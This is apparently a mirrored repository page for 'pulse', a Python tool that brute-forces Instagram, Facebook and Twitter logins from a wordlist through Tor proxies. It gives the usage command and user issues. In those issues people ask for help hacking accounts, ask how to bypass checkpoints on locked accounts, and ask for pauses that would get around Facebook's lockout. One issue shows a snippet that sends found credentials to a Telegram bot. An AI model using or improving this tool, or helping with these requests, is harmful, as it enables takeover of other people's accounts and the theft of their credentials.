Giter Club home page Giter Club logo

pulse-'s Introduction

No longer maintained, use hyrPulse instead

Usage

python pulse.py [site] [username] [wordlist]

python pulse.py Instagram username103 pass.lst

pulse-'s People

Contributors

bitwise-01 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

pulse-'s Issues

Not going ahead than this

screenshot from 2017-12-23 00-54-00
[-] Web-Site: Instagram
[-] Proxy Ip:
[-] Wordlist: pass.lst
[-] Username: Khushbu_Ak
[-] Password:
[-] Attempts:

+-------------------+

[-] Obtaining Proxy IP ...

TorManager

Hi, im trying to execute a file .py but when I execute it there's appear:

Traceback (most recent call last):
File "instagram.py", line 15, in
from Core.tor import TorManager
ImportError: No module named Core.tor

I don't know what I have to do to fix it, help me please.

Needs Tor

I follow the command, it says installing TOR, then it fails.. I installed TOR following the regular procedure, TOR Application opens normally now and i can browse, but it's not on the system it's just opening from the folder. so again going with your command, it keeps saying its installing TOR and failing.. any help would be appreciated .

Thanks,

mac os

does it work for mac os cause i download it and there's problem faced me it said no:: models named

Wordlist

Hi there,

Program exits before the whole wordlist is attempted. The wordlist contains 2000 words but the program exit at 623.

twitter issue

After while cracking it found password , but wrong password . it seems when it locked said correct password .

add total password Count & time

can you add total password count and start time count under here

print '  {}[-] Web-Site: {}{}'.format(W,G,website)
  print '  {}[-] Proxy Ip: {}{}'.format(W,G,proxyIp)
  print '  {}[-] Wordlist: {}{}'.format(W,G,wordlist)
  print '  {}[-] Username: {}{}'.format(W,G,username)
  print '  {}[-] Password: {}{}'.format(W,G,password)
  print '  {}[-] Attempts: {}{}'.format(W,G,attempts)

Hello

Please help me want hack Instagram you have hack

Come to private

Give to money really ok

how to make it work on Ubuntu 16.4

i Just Comment these two lines

if not 'kali' in platform():
  exit('Kali Linux 2.0 required')

script run but seems not work and not Access Granted !

solve please

[-] Web-Site: Facebook
[-] Proxy Ip:
[-] Wordlist: paas.txt
[-] Username: [email protected]
[-] Password:
[-] Attempts:
[-] Account Locked: False

+-------------------+

[-] Obtaining Proxy IP ...

[-] Web-Site: Facebook
[-] Proxy Ip: 216.239.90.19
[-] Wordlist: paas.txt
[-] Username: [email protected]
[-] Password:
[-] Attempts:
[-] Account Locked: False

+-------------------+

Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "pulse.py", line 120, in setupPasswords
with open(self.wordlist,'r') as passwords:
IOError: [Errno 2] No such file or directory: 'paas.txt'

Improve facebook module...

Hi, first of all great work... I tried the facebook module on my own account and I see that after 28 attempts my account locks and the program stopped work... So , for example, if i have to do an attack and testing more than 1000 words as passwords, could be possible add a "waiting" function that for every 20 attempts the program wait a minute? (it's an indicative time it depend by facebook you can misure it) To avoid the facebook locking system...
Thank you!

I don't have tried instagram and twitter but as I have understand there isn't this locker for these...

Tor Browser

Please help me. When I try to run the script it says "Installing Tor browser" then new line it says "Please Install tor". Even tho I have installed tor already but still wondering how come Tor browser?

bypass checkpoint

i found some ids but they are Locked , is there anyway can bypass checkpoint ?

New Issue

Last week I was able to use this, but today I cant, I am using the same thing, but for some reason, I can't anymore I used your Instagram.git, I got the same issue, [-] installing tor... and then [-] please install tor for no reason it always worked, I saw some other person experiencing the same issue and he never got it fixed so can you please help me?

I got these error some times not all time

In instagram
There are screens on: nize/_mechanize.py", line 254, in open ����return self._mech_open(url_or_request, data, timeout=timeout) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 284, in _mech_open ����response = UserAgentBase.open(self, request, data) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_opener.py", line 195, in open ��response = urlopen(self, req, data) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_urllib2_fork.py", line 352, in _open ��'_open', req) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_urllib2_fork.py", line 340, in _call_chain ��result = func(*args) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_urllib2_fork.py", line 1215, in https_open ��return self.do_open(conn_factory, req) ��File "/usr/local/lib/python2.7/dist-packages/mechanize/_urllib2_fork.py", line 1160, in do_open ����raise URLError(err) urllib2.URLError: <urlopen error [Errno 0] Error>

Add timeout for waiting respond of Proxy

when it try to connect some dead IPs it wait for ever to get respond that IP , and should manually stop cracking and start again . Please add some timeout to fix this issue .

save to file when Access Granted

would you please add save to output when Access Granted .
i added Below to send notification on Telegram

  print '  [-]{0} Access Granted{1}'.format(G,W)
  print '  [-] Username: {}{}{}'.format(G,self.email,W)
  print '  [-] Password: {}{}{}'.format(G,passwrd,W)
  requests.get('https://api.telegram.org/***************-s6Wds/sendMessage?chat_id=104*****&text=Account Found"')

but i don't know how to send Message include Username And Password it find to Telegram .

Just One Question!

So I Tried Running This on My Windows Machine and It Said This In Python Shell When I Went To Run It

Traceback (most recent call last):
File "C:\Users\Nick\Desktop\Pulse-master\pulse.py", line 13, in
from Core.tor import TorManager
File "C:\Users\Nick\Desktop\Pulse-master\Core\tor.py", line 3, in
import socks
ImportError: No module named socks

I Have Tor Browser Installed Also

Error

Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "pulse.py", line 120, in setupPasswords
with open(self.wordlist,'r') as passwords:
IOError: [Errno 2] No such file or directory: 'password.txt'

what did i do wrong?

TorManager

hello,

I'm facing an issue, using Kali Linux

Traceback (most recent call last):
File "pulse.py", line 13, in
from Core.tor import TorManager
File "/root/Desktop/Pulse-master/Core/tor.py", line 3, in
import socks
ImportError: No module named socks

Nah, doesn't work

your "Instagram.py" worked only once for me, this is a upgraded version, I see you copy pasted the code, the method is doing forcing instagram to go to a classic login and bruteforcing, I know this is not a completely non-functioning bruteforce script, but it will be better if it is accurate in finding the correct password, because mine just passes the password even it is in the .txt file.

pulse.py error

Hi Ethical-H4CK3R i'm getting this error: "pulse.py: error: unrecognized arguments: wordlist.txt" can you please tell me what i'm doing wrong?? thx.

This is what I typed (I tested it on my facebook profile so the username would've been mine):

python pulse.py www.facebook.com username wordlist.txt

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.